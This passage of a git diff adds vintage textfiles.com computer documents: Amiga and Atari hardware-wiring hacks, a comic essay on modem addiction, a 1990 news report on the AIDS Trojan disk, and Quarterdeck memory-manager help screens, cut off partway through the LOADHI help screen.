a/textfiles.com/computers/addcard.txt b/textfiles.com/computers/addcard.txt new file mode 100644 index 00000000..d4768f87 --- /dev/null +++ b/textfiles.com/computers/addcard.txt @@ -0,0 +1,84 @@ + + + + + + + **************************************************** + * * + * A1000/A500 86-pin to 100-pin Expansion * + * * + **************************************************** + + + This HACK will allow an Amiga 1000 or 500 to use it's 86-pin expansion + connector as an A2000 100-pin slot!!!!! + + + Parts Needed: + 1 100-pin edge connector (Female) + 1 86-pin edge connector (Female) + 1 74LS86 TTL gate + Ribbon Cable + + PLEASE Refer to included picture for building details: + + + Try to keep the cable length a short as possible, + longer cables tend to have noise problems. If used on + a 1000 the PAL's should be grounded to help prevent + noise problems. + + Also there may not be enough reserve power to run these + cards on a stock A500 power supply. Although I've had + it working on a stock A500 with a GVP card ( 40Q + 2Meg) + + + + The following products have been used successfully: + + Commodore A2091 w/40Q+2M + GVP Series I w/40Q+2M and w/105Q+2M + GVP Series II w/40Q+8M + SupraRam w/8M + Supra-zi Modems + + + The GVP Series II is very susceptible to bus noise + (probably because of the incrediable transfer rates it + achieves). My original cable was about 7 inches, it worked + with all of the listed products except the Series II. Making + the cable shorter proved to be the answer. + + + I've had this cable running for about 5 months on my + Amiga 1000 with a Spirit 1.5M Ram expansion and a + Commodore 2091 SCSI Controller (w/40M Quantum drive) + + If you find this usefull a ShareWare fee of $20 will + be greatly appreciated. + + Since I have found it somewhat difficult to find the + 86-pin and 100-pin edge connectors. I have put together + a Kit with all parts and instructions. This kit is + available with ShareWare Registration for $45+Shipping. + + If you have any additional questions or information. + Please contact me at. + + Joe Pellegrino + c/o Computer World + 6174 W Flamingo Rd. + Las Vegas, NV 89103 + USA + + + BBS ClickMeTwice (702)454-7787 + + + + + + + + diff --git a/textfiles.com/computers/addictio.txt b/textfiles.com/computers/addictio.txt new file mode 100644 index 00000000..3933e1e4 --- /dev/null +++ b/textfiles.com/computers/addictio.txt @@ -0,0 +1,147 @@ + + = THE TRAGEDY OF AN ON-LINE ADDICTION = + + - by Steve King - + +"Did you know that last month's (expletive) phone bill is over +$450?" my wife scolded me in her harshest, my-husband-the-child +voice. "That's more than twice the monthly payment you make for +that (expletive) computer!" she continued as she escalated to +screaming. + +"I confess! I confess!" I sobbed. "I'm just an on-line junkie +-- I'm addicted to my modem! I guess I'll just have to join +Modems Anonymous before I owe my soul to the phone company." + +As a counselor for Modems Anonymous, I hear numerous variations +of the preceding story every day. That insidious disease, modem +fever, is exacting a tragically large toll from the cream of our +society's computer users. Modem-mania is sweeping through the +very foundations of our country and there seems to be no stopping +it. This disease (yes, it is a social disease of almost epidemic +proportions) is becoming a such calamity that soon there's even +going to be a soap opera about on-line addiction named, "All My +Modems." + +If you don't already own one of those evil instruments called a +modem, take warning! Don't even think about buying one. Modem +fever sets in very quietly; it sneaks up on you and then grabs +you by the wallet, checkbook or, heaven forbid, credit cards. + +Once you own a modem, you enter the insidious addictive trap by +"dialing up" a friend who also has a modem. For some strange +reason, typing messages to each other fascinates you. (Even if +it is less than 10% of the speed that you can speak the same +words over a normal voice phone link.) Of course, you make +several attempts at hooking up before you finally figure out that +at least one of you must be in the half-duplex mode; that +discovery actually titillates you (sounds impossible, but it's +true). + +Then your modem-buddy (friend is too good a term) sows another +seed on the road to on-line addiction by giving you the number of +a local RBBS (Remote Bulletin Board Service). Once you get an +RBBS phone number, you've taken the first fatal step in a journey +that can only end in on-line addiction. + +After you take the next step by dialing up the the RBBS your +modem-buddy told you about, you find that it's very easy to +"log-on." This weird form of conversation with an unattended +computer is strangely exciting, much more so than just typing +messages when you're on-line with your modem-buddy. The initial +bulletins scroll by and inform you about the board, but you're +too "up" to comprehend most of it. Then you read some of the +messages in the message section and maybe, in a tentative manner, +you enter one or two of your own. That's fun, but the excitement +starts to wear off; you're calming down. Thinking that it might +be worthwhile to go back and re-read the log-on bulletins, you +return to the main RBBS menu. + +Then it happens. The RBBS provides the bait that entices you all +the way into the fiery hell of modem addiction. As you look at +the RBBS main menu to learn how to return to the log-on +bulletins, you find an item called FILES. By asking your host +computer for FILES, you thread the bait onto the hook of +corruption; the FILES SUBMENU sets the hook. You start running +with the line when you LIST the files; you leap into the air with +the sheer joy of the fight when all those public domain program +titles and descriptions scroll by. They're FREE!!! All you have +to do is tell the bulletin board to download (transmit) them to +you. You download your first program and you're landed, in the +creel, cleaned and ready for the cooking fires. In just 55 +minutes after you logged-onto the board, you've downloaded six +programs, one of them is Andrew Fleugelman's PC-Talk, version 3 +(truly an instrument for evil). + +RBBSLIST.DOC, which is also among the files you downloaded, +contains a list of a great number of bulletin boards throughout +the country. (There's evil all around us, constantly tempting +us!) You print the list and find about 60 RBBS phone numbers. +(Have mercy on our souls!) The list also gives you the hours of +operation, communications parameters and informs you about each +board's specialty. You decide to try PC-Talk and use it to +dial-up an RBBS about three states away. Since the line is busy, +you pass the time entering all those RBBS phone numbers into +PC-Talk's voluminous dialing directory. + +You try the number again -- still busy. You think, "Hey, there's +one that specializes in Pascal programs. Maybe I'll try it. It's +about half-way across the country, but it's after 5pm and the +phone rates have changed. It won't be too expensive." + +The Pascal board answers. After 45 minutes you've downloaded +another five programs. Then you call another board -- only this +one's completely across the country from California, in Florida. +And so it goes on into the night... And the next night... And +the next... + +Some days it gets to you. You begin to feel the dirtiness of +modem addiction, particularly when your wife makes you feel like +a child by berating you for those astronomical phone bills -- if +she hasn't divorced you by then. Every time you sit down before +your IBM PC to do some work, you dial up another RBBS instead. +If that one's busy, you call another, and another, until you +connect. Then you feel OK, almost "high." When you finally hang +up, you still can't work; you can only dial up another RBBS. + +Your downfall as an on-line addict is just another one of this +society's terrible tragedies, such as polygamy or the compulsion +to circle all the numbers on computer magazine "bingo cards." +Eventually your whole social life relies upon only the messages +you find on electronic bulletin boards; your only happiness is +the programs you have downloaded. (You never try any of them, +you only collect them.) + +Hope exists, however. We, the dedicated but under-paid staff of +Modems Anonymous, have done extensive research to find a cure for +modem mania, which has been ruining hundreds of lives. And we +have succeeded in our quest. The cure is really quite simple, +yet effective: + Set up your own remote bulletin board service. Then + all the other modem addicts will phone you, and their + wives can nag at them about $450 phone bills. And you + can find peace -- at last. + + + + +X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X + + Another file downloaded from: NIRVANAnet(tm) + + & the Temple of the Screaming Electron Jeff Hunter 510-935-5845 + Rat Head Ratsnatcher 510-524-3649 + Burn This Flag Zardoz 408-363-9766 + realitycheck Poindexter Fortran 415-567-7043 + Lies Unlimited Mick Freen 415-583-4102 + + Specializing in conversations, obscure information, high explosives, + arcane knowledge, political extremism, diversive sexuality, + insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS. + + Full access for first-time callers. We don't want to know who you are, + where you live, or what your phone number is. We are not Big Brother. + + "Raw Data for Raw Nerves" + +X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X diff --git a/textfiles.com/computers/addrive.txt b/textfiles.com/computers/addrive.txt new file mode 100644 index 00000000..b92dd965 --- /dev/null +++ b/textfiles.com/computers/addrive.txt @@ -0,0 +1,160 @@ + + Generic + 3.5 Inch Double Sided Disk Drive + for + The 520/1040 Series + by + James Lacassagne + + + +Purpose: This document is a description of the hook-ups and mod- + ifications that I found necessary in adding a 3.5 inch + double sided drive to my Atari(tm) 520. It is intended + solely as a guide to anyone who is interested in saving + a few dollars by using an "industry standard" drive in + place of the Atari SF314. + +Warning: This installation seems to function properly for my sys- + tem, but I cannot guarantee anything. Also, the only way + that a saving will result is if a suitable power supply + is already available, or can be obtained at a very low + price. + +Requirements: 1 3.5" Double Sided Drive w/ Installation kit @ $130 + (The Unit I used was a Toshiba(tm) ND-352 + which came with a multi-purpose mounting + kit. BE SURE that the unit is XT compat- + ible!!(720 K etc)) + 1 5v/12vdc Regulated Power Supply @ $ 25 + (The supply must be capable of supplying + 5V.+/-5% @200 mA and 12V.+/-5% @300 mA. + I saved some money here by using the same + supply that I used for adding a 5 1/4 in. + drive as described in numerous articles + in magazines and on Bulletin Boards.) + + 1 34 pin Card Edge Connector @ $ 3 + (Yes, This is the "industry standard" + used on all XT's and Clones. I got mine + at Radio Shack (P/N____________).) + + 1 Standard Atari(tm) 3.5 in Disk Drive Cable @ $ 8 + (Preferably, one of the After Market types + 6' or so in length.) + + 1 Disk Drive Case @ $ ? + (This is optional--I still haven't found + a good cheap one, but the drive seems to + work fine.) + +Procedure: There are two ways to proceed with this project depending + on whether you want the new drive to be A or B. The Drive + B method is the simpler, so I will start with it. + + Cut the Standard Drive Cable in half (Save the other + half for another project--maybe!) + + Strip back about 2" of the outer insulation from the + cable. Do Not cut off the shield wire (a layer of wire + woven around the multiple conductors in the cable). + Carefully unweave the shield, and twist it to form a + wire of its own. + + Since the 34 pin connector that I used was designed for + ribbon cable, some ingenuity is required here. Each pin + on the connector ends in a V shaped stud designed to + separate the ribbon cable wire and cut only its insul- + ation when the cover is forced in place. Since most of + the wires in the cable go to the top row of the con- + nector (the even numbered pins) and the shield goes + to the bottom row, along with the wires from pins 3 and + 7 of the Atari connector, I divided them accordingly and + routed them above and below the connector cover. Very + carefully, I pushed each wire far enough into the cor- + responding Vstud to hold it in place. I then forced + the cover down, forcing the wires the rest of the way + into the V. By trial and error I found that the two + ground wires (pins 3 and 7) in the cable did not provide + a sufficient ground path, causing unreliable drive oper- + ation. I overcame this by (gasp!) tying the shield to + ALL of the odd numbered pins on the connector. (That's + what the twisted shield wire is used for.) Carefully + lay it over the bottom row of Vstuds before putting + the connector cover on. The Connections Follow: + + (NOTE: the colors mentioned are for an Atari Cable + You should check if you are using an After Market + Cable.) + + 34 pin conn. Atari conn. Signal Color + 2 * media chng + 4 N/A in use + 6 N/A d4 sel + 8 4 index yellow + 10 5 d0 sel green + 12 6 d1 sel violet + 14 N/A d2 sel + 16 8 motor on brown + 18 9 direction orange + 20 10 step grey + 22 11 wrt data pink + 24 12 wrt gate lt. blue + 26 13 track 0 lt. brown + 28 14 wrt prot lt. green + 30 1 read data red + 32 2 side 0 white + 34 * rdy/med ch + (any 3 logic gnd blue + odd) 7 logic gnd black + + Assemble the Disk Drive and Adapter kit. It should have + come with a power cable adapter with a std XT con- + nector on the end. You can either buy a mating + connector or cut it off and splice directly to the wires. + (Generally, pin 1 (red) is 5V, pin 4 (yel) is 12V, and + pins 2&3 (blk) are Ground.) The Installation Kit may + refer to a jumper on pin 34, but this can be ignored. + + Now, the only modification to the drive can be made. + On the Installation Kit PC Board, a Jumper must be + soldered between pin 2 and pin 28 of the Drive Con- + nector.(This is the one that actually connects to + the Disk Drive. It is identical in pin layout to the + Std connector, with pin 2 on the top left as you look + at it.) This connects the Media Change signal on pin + 2 to the Write Protect signal.(Thanks to Analog2 for + pointing me in the right direction on this one.) + These are both open collector, active low signals, and + can be safely wired together.(wired or configuration) + + This should be all that has to be done to make the + drive work. Simply plug the cable into the OUT con- + nector of the first drive or the 1040, and away you + go. + + If you have a 520 and want this to be drive A, the + procedure is the same, except DO NOT CUT THE CABLE + IN HALF. Instead, strip a 3-4 in. section in the + center of the cable, Cut and unweave 1/2 of the + shield. Lead the wires over the Vstuds as before, + but cut the wires from the Atari connector pins 5& + 6.(computer end) Pin 5 wire is connected to the Std + connector pin 10 and pin 6 wire is connected to the + remaining end of pin 5.(The part that will go to the + second drive.) This brings the ds1 signal to the + ds0 pin on the second drive, just like Atari does it. + You can cut off the remaining pin 6 wire if you like, + since it doesn't get used. Don't forget to attach the + shield to the odd number connector pins. + + If you have understood and followed my directions, the + drive should function properly. If not, there is not + much that can cause damage. My version will read and + format and write to double and single sided disks + without any problems. If you encounter any difficulty, + I can be contacted through Delphi as JIMSL or Com- + puserve No. 72257,1613. + + + Atari, Radio Shack, and Toshiba are Registered Trademarks. diff --git a/textfiles.com/computers/aids.txt b/textfiles.com/computers/aids.txt new file mode 100644 index 00000000..4667471e --- /dev/null +++ b/textfiles.com/computers/aids.txt @@ -0,0 +1,50 @@ + +MARCH 1990 +AIDS TROJAN MARCHES ON + +LONDON - It has been almost three +months since infected Aids Information +disks started landing on user's desks. +Despite the high level of publicity, +users continue to ignore the warnings +install the disk and allowing the Trojan +to continue causing damage. + +UK-based detective Barry Donovan predicts +there will be users who will install the +disk and then forget about it until it +triggers after 90 or so reboots. For +some users, those 90 reboots are now +up. + +A representative from Michelin Tyres +in Nigeria contacted PC Business World, +UK, to request a Clearaid disk because the +virus had just triggerd on his home PC. He +said a significantly large number of disks +are in circulation in West Africa. + +The US arm of Save the Children Fund offices +in Ethiopia also became a victim of the +blackmail attempt having PC's "wiped out +by the Trojan". Other US-based charities +with offices in the African continent have +reported similar attacks, despite local +media coverage and warning issued by +charities, local police forces, and wide area +networks like Usenet. + +Joseph Popp, whom FBI agents arrested in +connection with the mailing, is still being +held in an Ohio prison awaiting extradition +proceedings. He has made a second court +appearance to appeal against his continued +detention in order to be medically examined. +The court, however, ruled such assessments +should be conducted in prison. According to +Scotland Yard, Popp's extradition hearing will +be held in early April. + + + + diff --git a/textfiles.com/computers/all-help.tec b/textfiles.com/computers/all-help.tec new file mode 100644 index 00000000..72d65189 --- /dev/null +++ b/textfiles.com/computers/all-help.tec @@ -0,0 +1,527 @@ +ID:SW Switches available for QOS products +Quarterdeck Technical Note +by Quarterdeck + +What follows is all the help screens from the DESQview 2.26, QEMM 5.0, +Manifest 1.0, QRAM 1.0, and some of their utilities: + +From QEMM.SYS: + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º QEMM is an expanded memory manager for 80386 machines º + º It also gives High RAM and other capabilities º + º º + º Syntax: º + º DEVICE=QEMM.SYS [switches] º + º º + º QEMM switches: º + º ADAPTERRAM=xxxx-yyyy An adapter has RAM in the range º + º ADAPTERROM=xxxx-yyyy An adapter has ROM in the range º + º AUTO Turn on only if necessary º + º COMPAQ386S Identify this as a COMPAQ 386S º + º COMPAQEGAROM Relocate COMPAQ's video ROM º + º COMPAQHALFROM Split system ROM in half º + º COMPAQROMMEMORY Use COMPAQ memory reserved for ROM º + º DISKBUF=xx Set the size of the SCSI disk buffer º + º DMA=xx Set the size of the DMA buffer º + º DOS4 Alter EMS page ordering for DOS 4.00 º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º EXCLUDE=xxxx-yyyy Consider the range unmappable º + º EXTMEM=xxxxx Reserve xxxxxK of extended memory º + º FORCEEMS Still act like EMS even if no frame º + º FRAME=xxxx Set the page frame; xxxx=seg or NONE º + º FRAMELENGTH=x Set the page frame to be x pages º + º HANDLES=xxx Set the number of EMS handles º + º HMAMIN=xx Set the minimum size of the HMA (0-63K) º + º IGNOREA20 Don't trap the 8042 º + º INCLUDE=xxxx-yyyy Consider the range mappable º + º LOCKDMA Don't allow interrupts during DMA processing º + º MAPS=xx Set the number of alternate register sets º + º MEMORY=xxxxx Use only xxxxxK of extended memory º + º NOCOMPAQFEATURES Disable EGAROM, HALFROM, ROMMEMORY º + º NOEMS Don't be an expanded memory manager º + º NOFILL Don't fill conventional memory º + º NOHMA Don't allow access to the HMA º + º NOROM Don't map the "reboot" page of the system ROM º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º NOROMHOLES Don't find holes in the system ROM º + º NOSHADOWRAM Don't use C&T Shadow RAM º + º NOSORT Don't sort memory º + º NOTOPMEMORY Don't look for "top memory" º + º NOVIDEOFILL Don't fill into video memory º + º NOVIDEORAM Don't put RAM into video memory º + º NOXBDA Don't move the eXtended BIOS Data Area º + º NOXMS Don't be an extended memory manager º + º OLDDV DV 1.3 or 2.00 will be run º + º OFF Turn QEMM OFF º + º ON Turn QEMM ON º + º RAM[=xxxx-yyyy] Put RAM everywhere or in the range º + º ROM[=xxxx[-yyyy]] Map ROM everywhere or in the range º + º TASKS=xx Set the interrupt nesting level º + º UNUSUAL8042 The 8042 is non-standard º + º UNUSUALEXT The extended memory BIOS is non-standard º + º VIDRAMEGA Configure for EGA feature of VIDRAM º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º VIDRAMEMS Configure for EMS feature of VIDRAM º + º WATCHDOG=[0,1,2] Set the type of Watchdog timer º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +From QEMM.COM + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º QEMM displays and gives some control over certain º + º functions of QEMM.SYS º + º º + º Syntax: º + º QEMM [switches] º + º QEMM with no parameters shows SUMMARY and TYPE º + º º + º QEMM switches: º + º AUTO Put QEMM into AUTO mode º + º ON Turn QEMM on º + º OFF Turn QEMM off º + º TYPE Display QEMM type information º + º ACCESSED Display QEMM accessed information º + º ANALYSIS Cross-reference ACCESSED with TYPE º + º MEMORY Display QEMM memory usage º + º SUMMARY Display QEMM summary º + º LIST Display charts in LIST format º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEMM º + º Copyright (c) 1986-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º MAP Display charts in MAP format º + º RESET Reset ACCESSED info to unaccessed º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +From QEXT.SYS +Quarterdeck Extended Memory Manager 286 V5.10 +Copyright (c) 1987-1990 by Quarterdeck Office Systems + + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEXT º + º Copyright (c) 1987-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º QEXT.SYS is an extended memory manager º + º º + º Syntax: º + º DEVICE=QEXT.SYS [switches] º + º º + º QEXT switches: º + º BLOCKSIZE=xxxxx Specify the size of extended memory transfers º + º EXTMEM=xxxxx Reserve xxxxxK of extended memory º + º HANDLES=xxx Set the number of EMB handles º + º HMAMIN=xx Set the minimum size of the HMA (0-63K) º + º MEMORY=xxxxx Use only xxxxxK of extended memory º + º NOXMS Don't be an extended memory manager º + º UNUSUAL8042 The 8042 is non-standard º + º VDISKVERSION=m.n Look like a version m.n VDISK º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QEXT º + º Copyright (c) 1987-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +From Manifest: + +MANIFEST [Category] [Topic] [/M] [/L] [/N] [/P] [/A] [/Bd] [/Tn] [/?] + + Category Topic +System [ Overview CONFIG AUTOEXEC Adapters CMOS ] +First Meg [ Overview Programs Interrupts BIOS Data Timings ] +Expanded [ Overview Pages Handles Timings Benchmark ] +Extended [ Overview XMS ] +DOS [ Overview Drivers Files Environment ] +QEMM-386 [ Overview Type Accessed Analysis Memory ] +Hints [ Overview Detail ] + * = all overviews + * = all topics in category + * * = all information + + Switches: M - monochrome (2 color) display + L - EGA: 43 rows; VGA: 50 rows + N - CGA: No sync - with snow + P - PAUSE after each screen to console + A - show alternate F3 screens + Bd - specify boot drive letter + Tn - automatically TSR (hotkey choice 1-3) + ? - This help screen + + +From QRAM: + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QRAM º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º QRAM provides high RAM for use by LOADHI when º + º loaded after an EMS 4 or EEMS driver º + º º + º Syntax: º + º DEVICE=QRAM.SYS [switches] º + º No switches means the RAM option º + º º + º QRAM switches: º + º EXCLUDE=xxxx-yyyy Don't put RAM in the range º + º FORCEEMS Still act like EMS even if no frame º + º FRAMELENGTH=x Set the page frame to be x (0-4) pages º + º HIDE=xxxx-yyyy Hide that the range is mappable º + º INCLUDE=xxxx-yyyy Put RAM or fill in the range º + º NOFILL Don't fill conventional memory º + º NOSHADOWRAM Don't use C&T Shadow RAM º + º NOVIDEOFILL Don't fill into video memory º + º NOVIDEORAM Don't put RAM into video memory º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º QRAM º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º NOXBDA Don't move the eXtended BIOS Data Area º + º NOXMS Don't be an extended memory manager º + º RAM[=xxxx-yyyy] Put RAM everywhere or in the range º + º REGION:n Load into region number n º + º VIDRAMEGA Configure for EGA feature of VIDRAM º + º VIDRAMEMS Configure for EMS feature of VIDRAM º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º EMS º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º EMS gives status of and control over expanded º + º memory handle functions. º + º º + º Syntax: º + º EMS [param] º + º EMS with no parameter gives EMS status º + º º + º EMS parameters: º + º CREATE name size Create a handle with the given name and size º + º CREATEFAST name size Create a handle with fast expanded memory º + º CREATESLOW name size Create a handle with slow expanded memory º + º DIR Display current handle sizes and names º + º FREE handle Free the given handle º + º LOAD handle file Load handle data from the specified file º + º RENAME handle name Change a handle's name º + º RESIZE handle size Change amount of memory allocated to a handle º + º SAVE handle file Save handle data in the specified file º + º Press any key for next page... º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º EMS º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + º º + º where: º + º name - is a handle name of up to 8 characters. The name need º + º not be quoted unless it contains blanks. º + º size - is the number of 16K pages to be allocated. If the number º + º is followed immediately by the letter 'K', it represents º + º the number of kilobytes to allocate. º + º handle - is either a 'name' as described above or a handle number º + º file - is a DOS file name º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º LASTDRIVE º + º Copyright (c) 1989-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º LASTDRIV displays and increases the highest º + º DOS drive letter º + º º + º Syntax: º + º LASTDRIV [param] º + º LASTDRIV with no parameter shows the current º + º highest drive letter º + º º + º LASTDRIV parameters º + º l Set the highest drive to letter l º + º =l Set the highest drive to letter l º + º +num Increase the number of letters by num º + º NOPAUSEONERROR Don't pause on error º + º PAUSE Pause while parsing commands º + º HELP Display this help text º + º ? List all commands º + ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +From LOADHI.COM + ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» + º LOADHI º + º Copyright (c) 1988-1990 º + º Quarterdeck Office Systems, Inc. º + º º + º LOADHI loads TSRs into high RAM º + º º + º Syntax: º + º LOADHI [switches] [prog-name [prog-switches]] º + º LOADHI with no parameters shows status º + º º + º LOADHI switches: º + º 